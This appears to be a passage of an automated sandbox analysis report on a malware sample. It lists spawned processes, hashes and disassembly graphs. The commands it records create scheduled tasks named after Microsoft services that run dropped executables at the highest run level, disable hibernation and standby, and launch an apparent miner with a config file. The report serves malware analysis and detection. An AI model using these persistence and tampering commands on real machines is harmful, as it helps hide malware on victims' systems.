                                                                                                                                                                                                                    Commandline:SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                                                                                                                    Imagebase:0xff0000
                                                                                                                                                                                                                    File size:185856 bytes
                                                                                                                                                                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:45
                                                                                                                                                                                                                    Start time:00:17:20
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                                                                                                                    Imagebase:0xff0000
                                                                                                                                                                                                                    File size:185856 bytes
                                                                                                                                                                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:46
                                                                                                                                                                                                                    Start time:00:17:20
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:47
                                                                                                                                                                                                                    Start time:00:17:20
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
                                                                                                                                                                                                                    Imagebase:0xb0000
                                                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:48
                                                                                                                                                                                                                    Start time:00:17:20
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                                                                                                                    Imagebase:0xff0000
                                                                                                                                                                                                                    File size:185856 bytes
                                                                                                                                                                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:49
                                                                                                                                                                                                                    Start time:00:17:20
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:50
                                                                                                                                                                                                                    Start time:00:17:21
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\powercfg.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:powercfg /x -hibernate-timeout-ac 0
                                                                                                                                                                                                                    Imagebase:0x100000
                                                                                                                                                                                                                    File size:80896 bytes
                                                                                                                                                                                                                    MD5 hash:FA313DB034098C26069DBADD6178DEB3
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:51
                                                                                                                                                                                                                    Start time:00:17:21
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
                                                                                                                                                                                                                    Imagebase:0xff0000
                                                                                                                                                                                                                    File size:185856 bytes
                                                                                                                                                                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:52
                                                                                                                                                                                                                    Start time:00:17:21
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\powercfg.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:powercfg /x -hibernate-timeout-dc 0
                                                                                                                                                                                                                    Imagebase:0x100000
                                                                                                                                                                                                                    File size:80896 bytes
                                                                                                                                                                                                                    MD5 hash:FA313DB034098C26069DBADD6178DEB3
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:53
                                                                                                                                                                                                                    Start time:00:17:21
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\powercfg.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:powercfg /x -standby-timeout-ac 0
                                                                                                                                                                                                                    Imagebase:0x100000
                                                                                                                                                                                                                    File size:80896 bytes
                                                                                                                                                                                                                    MD5 hash:FA313DB034098C26069DBADD6178DEB3
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:54
                                                                                                                                                                                                                    Start time:00:17:22
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                                                                                                    Imagebase:0x7ff651c80000
                                                                                                                                                                                                                    File size:51288 bytes
                                                                                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:55
                                                                                                                                                                                                                    Start time:00:17:22
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\powercfg.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:powercfg /x -standby-timeout-dc 0
                                                                                                                                                                                                                    Imagebase:0x100000
                                                                                                                                                                                                                    File size:80896 bytes
                                                                                                                                                                                                                    MD5 hash:FA313DB034098C26069DBADD6178DEB3
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:56
                                                                                                                                                                                                                    Start time:00:17:22
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\ProgramData\RuntimeBrokerData\RegSvc.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:C:\ProgramData\RuntimeBrokerData\RegSvc.exe
                                                                                                                                                                                                                    Imagebase:0x1b0000
                                                                                                                                                                                                                    File size:88064 bytes
                                                                                                                                                                                                                    MD5 hash:BFD02E7E401667B6C5853FE0FBEC26E7
                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:57
                                                                                                                                                                                                                    Start time:00:17:22
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\powercfg.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:powercfg /hibernate off
                                                                                                                                                                                                                    Imagebase:0x100000
                                                                                                                                                                                                                    File size:80896 bytes
                                                                                                                                                                                                                    MD5 hash:FA313DB034098C26069DBADD6178DEB3
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:59
                                                                                                                                                                                                                    Start time:00:17:23
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                                                                                                                    Imagebase:0xff0000
                                                                                                                                                                                                                    File size:185856 bytes
                                                                                                                                                                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:61
                                                                                                                                                                                                                    Start time:00:17:23
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                                                                                                    Imagebase:0x7ff651c80000
                                                                                                                                                                                                                    File size:51288 bytes
                                                                                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:67
                                                                                                                                                                                                                    Start time:00:17:24
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                                                                                                    Imagebase:0x7ff651c80000
                                                                                                                                                                                                                    File size:51288 bytes
                                                                                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:68
                                                                                                                                                                                                                    Start time:00:17:25
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                                                                                                    Imagebase:0x7ff651c80000
                                                                                                                                                                                                                    File size:163336 bytes
                                                                                                                                                                                                                    MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:70
                                                                                                                                                                                                                    Start time:00:17:26
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                                    Imagebase:0x7ff651c80000
                                                                                                                                                                                                                    File size:51288 bytes
                                                                                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:71
                                                                                                                                                                                                                    Start time:00:17:28
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                                                                                                    Imagebase:0x7ff651c80000
                                                                                                                                                                                                                    File size:51288 bytes
                                                                                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:72
                                                                                                                                                                                                                    Start time:00:17:59
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"cmd.exe" /c chcp 1251 & C:\ProgramData\RuntimeBrokerData\svhost.exe -c config.json
                                                                                                                                                                                                                    Imagebase:0xb0000
                                                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:73
                                                                                                                                                                                                                    Start time:00:18:01
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:74
                                                                                                                                                                                                                    Start time:00:18:01
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\chcp.com
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:chcp 1251
                                                                                                                                                                                                                    Imagebase:0x100000
                                                                                                                                                                                                                    File size:12800 bytes
                                                                                                                                                                                                                    MD5 hash:561054CF9C4B2897E80D7E7D9027FED9
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:80
                                                                                                                                                                                                                    Start time:00:18:14
                                                                                                                                                                                                                    Start date:19/03/2023
                                                                                                                                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:13.3%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                                      Total number of Nodes:23
                                                                                                                                                                                                                      Total number of Limit Nodes:3
                                                                                                                                                                                                                      execution_graph 26450 11d73d8 26451 11d73f4 26450->26451 26454 11d8e5a 26451->26454 26452 11d74c5 26455 11d8e62 26454->26455 26457 11d8ece 26454->26457 26460 11d8f49 26455->26460 26464 11d8f58 26455->26464 26457->26452 26462 11d8f7f 26460->26462 26461 11d905c 26461->26461 26462->26461 26468 11d84cc 26462->26468 26466 11d8f7f 26464->26466 26465 11d905c 26465->26465 26466->26465 26467 11d84cc CreateActCtxA 26466->26467 26467->26465 26469 11d9fe8 CreateActCtxA 26468->26469 26471 11da0ab 26469->26471 26472 9de29e0 26473 9de2b6b 26472->26473 26474 9de2a06 26472->26474 26474->26473 26477 9de2c59 PostMessageW 26474->26477 26479 9de2c60 PostMessageW 26474->26479 26478 9de2ccc 26477->26478 26478->26474 26480 9de2ccc 26479->26480 26480->26474

                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                      Function 011D07EB Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 110 11d07eb-11d07fd 111 11d07ff-11d080e 110->111 112 11d0849-11d0853 110->112 111->112 113 11d0859-11d086b 112->113 114 11d0855-11d0857 112->114 115 11d086f-11d087b 113->115 116 11d0aba-11d0b83 113->116 114->113 115->116 117 11d0881-11d0891 115->117 120 11d0b8a 116->120 117->116 121 11d0b8f-11d0b9e 120->121 122 11d0c8b-11d0ccf 121->122 123 11d0ba4 121->123 145 11d0cd1 call 11d1649 122->145 146 11d0cd1 call 11d159a 122->146 147 11d0cd1 call 11d1d75 122->147 148 11d0cd1 call 11d1a74 122->148 123->120 123->122 124 11d0bbf-11d0bcf 123->124 125 11d0c09-11d0c17 call 11d0d09 123->125 126 11d0bab-11d0baf 123->126 127 11d0c74-11d0c86 123->127 128 11d0bd1-11d0be6 123->128 129 11d0c41-11d0c6f 123->129 124->121 140 11d0c1d-11d0c3c 125->140 131 11d0bb8 126->131 132 11d0bb1-11d0bb6 126->132 127->121 139 11d0bee-11d0c07 128->139 129->121 134 11d0bbd 131->134 132->134 134->121 139->121 140->121 144 11d0cd7-11d0ce0 145->144 146->144 147->144 148->144
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 61-
                                                                                                                                                                                                                      • API String ID: 0-2869604582
                                                                                                                                                                                                                      • Opcode ID: f7858ad9b6b1ca343b19c38aeed1766d959ad0a7c6a4cc9b558c35ed66a992cc
                                                                                                                                                                                                                      • Instruction ID: 349542c068874de1f21a192d9f1cb0e3b3193a8daf11f36e0953e9bb3ef21cfb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7858ad9b6b1ca343b19c38aeed1766d959ad0a7c6a4cc9b558c35ed66a992cc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34813671E083448FC749CF68C894AAEBBF1FF99210F1185AAE481DB252D7359D06CF92
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084ECFE6 Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 185 84ecfe6-84ed013 187 84ed01a 185->187 188 84ed01f-84ed034 187->188 189 84ed03a 188->189 190 84ed1a7-84ed1ae 188->190 189->187 189->190 191 84ed0dd-84ed100 call 84ea760 189->191 192 84ed138-84ed14c call 84ea770 189->192 193 84ed105-84ed11a 189->193 194 84ed095-84ed0ac call 84ea730 189->194 195 84ed180-84ed18e 189->195 196 84ed041-84ed093 189->196 197 84ed151-84ed16b call 84ea780 189->197 198 84ed0b1-84ed0bf call 84ea740 189->198 191->188 192->188 215 84ed11f-84ed121 193->215 194->188 217 84ed194 call 84ed738 195->217 218 84ed194 call 84ed726 195->218 196->188 205 84ed170-84ed17b 197->205 203 84ed0c4-84ed0c8 call 84ea750 198->203 213 84ed0cd-84ed0d8 203->213 205->188 207 84ed197-84ed1a2 207->188 213->188 219 84ed123 call 84e869a 215->219 220 84ed123 call 84e86a8 215->220 216 84ed128-84ed133 216->188 217->207 218->207 219->216 220->216
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: @.rJ
                                                                                                                                                                                                                      • API String ID: 0-58941233
                                                                                                                                                                                                                      • Opcode ID: b58a5954250406d7aca8b37bf248d2ef12b6d5fe2268de1aac566f9a7be3535e
                                                                                                                                                                                                                      • Instruction ID: 9ec17e8ebdffbe33545eb74fba2803c90a20b79d0d7e836ff9b68d63b57d1ae0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b58a5954250406d7aca8b37bf248d2ef12b6d5fe2268de1aac566f9a7be3535e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D410335B181108FD705AB7DC98567EBFB7AFD9202B09449BE541EF6A2DA31CC028792
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084ED008 Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 221 84ed008-84ed013 222 84ed01a 221->222 223 84ed01f-84ed034 222->223 224 84ed03a 223->224 225 84ed1a7-84ed1ae 223->225 224->222 224->225 226 84ed0dd-84ed100 call 84ea760 224->226 227 84ed138-84ed14c call 84ea770 224->227 228 84ed105-84ed121 224->228 229 84ed095-84ed0ac call 84ea730 224->229 230 84ed180-84ed18e 224->230 231 84ed041-84ed093 224->231 232 84ed151-84ed16b call 84ea780 224->232 233 84ed0b1-84ed0c8 call 84ea740 call 84ea750 224->233 226->223 227->223 254 84ed123 call 84e869a 228->254 255 84ed123 call 84e86a8 228->255 229->223 252 84ed194 call 84ed738 230->252 253 84ed194 call 84ed726 230->253 231->223 240 84ed170-84ed17b 232->240 248 84ed0cd-84ed0d8 233->248 240->223 242 84ed197-84ed1a2 242->223 248->223 251 84ed128-84ed133 251->223 252->242 253->242 254->251 255->251
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: @.rJ
                                                                                                                                                                                                                      • API String ID: 0-58941233
                                                                                                                                                                                                                      • Opcode ID: 6feefb8db76cfe3871c8f1f0de26defd422288e0bfd0eef93c30800db0acbd0f
                                                                                                                                                                                                                      • Instruction ID: fdc8721b440d472f41e678336ebe02f22b395515f7958693e1cf3565f491178c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6feefb8db76cfe3871c8f1f0de26defd422288e0bfd0eef93c30800db0acbd0f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA41E135F100158FD708EE7DC98567EBAA7AFD8606B09446FE502EB3A1DA31CD128782
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 011D8989 Relevance: .4, Instructions: 356COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 5cae087fa2bb6704a37f399564c2dcc1233603c486c436415ebb0a2e8afc6397
                                                                                                                                                                                                                      • Instruction ID: d2f298f0b53088f0e53facde66a44c1829088aa93e22185e08fc5f47b5c34bcc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5cae087fa2bb6704a37f399564c2dcc1233603c486c436415ebb0a2e8afc6397
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F9D1B070B046148BCB5DCF2DC8916AEFBF2AFC5310B19896AD086DB2A5DB34EC41CB55
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 011D7918 Relevance: .3, Instructions: 301COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: da8c0a43dd3dc2fc6b8450dc58b32b9123b3a15980cffd2cfae0ddd84d786459
                                                                                                                                                                                                                      • Instruction ID: c604a8892559b229f508482e3c82c21c878c4a67bf830f9ac81f2e89dc08d0c0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da8c0a43dd3dc2fc6b8450dc58b32b9123b3a15980cffd2cfae0ddd84d786459
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9CB19E31B101158FCB48CB78C968A6DBBE7FF89714F29856AE506DB3A4CB74DC018B81
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 011D1649 Relevance: .3, Instructions: 289COMMON
